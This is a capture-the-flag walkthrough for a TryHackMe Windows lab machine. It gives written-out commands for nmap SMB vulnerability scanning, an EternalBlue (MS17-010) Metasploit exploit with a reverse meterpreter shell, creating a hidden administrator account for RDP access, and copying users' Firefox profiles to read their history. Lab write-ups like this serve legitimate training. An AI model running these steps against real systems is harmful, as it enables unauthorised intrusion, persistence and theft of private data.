Pepega Energy Walkthrough

Try Hack Me - Pepega Energy

As usual we start with a nmap scan: nmap -sCVT -oN nmap.out

135/tcp   open  msrpc              syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn        syn-ack Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       syn-ack Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ssl/ms-wbt-server? syn-ack
|_ssl-date: 2020-06-09T12:16:34+00:00; +2s from scanner time.
5357/tcp  open  http               syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
9001/tcp  open  tcpwrapped         syn-ack
49152/tcp open  msrpc              syn-ack Microsoft Windows RPC
49153/tcp open  msrpc              syn-ack Microsoft Windows RPC
49154/tcp open  msrpc              syn-ack Microsoft Windows RPC
49155/tcp open  msrpc              syn-ack Microsoft Windows RPC
49159/tcp open  msrpc              syn-ack Microsoft Windows RPC
49160/tcp open  msrpc              syn-ack Microsoft Windows RPC
Service Info: Host: PEPEGAENERGY-01; OS: Windows; CPE: cpe:/o:microsoft:windows

Looks like this is a windows machine with SMB enabled, and as it is an older version of windows we should run some more checks. We can search for nse script for nmap with the following command: locate nse | grep smb which will give us a list of scripts we can run to check smb. So let's run all the smb-vuln scripts: nmap --script smb-vuln* -p 445

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|     Disclosure date: 2017-03-14
|     References:

Jackpot! The machine is vulnerable to MS17-010, this should be easy with Metasploit, so let's fire up msfconsole and search for ms17-010 and use the exploit/windows/smb/ms17_010_eternalblue module. Set the payload to windows/x64/meterpreter/reverse_tcp, fill the RHOSTS and LHOST with the right IP's and run the exploit. We should be greeted with a nice win message and a meterpreter shell:


And if we run getuid we can see we are system! Job done, we own the box, so let's start the hunt for flags!

We can drop into a local shell with the shell command and run net users to see all the user accounts on the system: users Awesome, now let's find out some more stuff about the users and run net user Zachary. From the output we can see this user is in the Administrators group. So let's do the same for Timmy: Timmy Looks like Timmy is in the Remote Desktop Users group! And since we are System, we could just change his password and login, but let's try to be less destructive and create our own user with the following command: net user monokuma password /add

Then add this user to the Remote Desktop Users group: net localgroup "Remote Desktop Users" monokuma /add and the Administrators group: net localgroup "Administrators" monokuma /add. With all that, we should be able to connect to the computer with RDP: xfreerdp /u:monokuma /p:password /v: Oops So now that we are on the computer we can start looking around in all the folders, and since we are an Administrator, screens like these won't stop us! Have a look at all the files on the desktops for all the users, you will find everything you need!

Now for our next trick, we would like to see what their browser history looks like, first we need to enable showing hidden files:


Now if we go to: C:\Users\Timmy\AppData\Roaming there is a folder named Mozilla, let's copy this folder and place it in our AppData\Roaming:


Now if we open FireFox and look at the history with ctrl+h:


We can see exactly what Timmy has been up to, now we can do the same for Zachary:


There we have it! A system owned and the passwords for users still in place!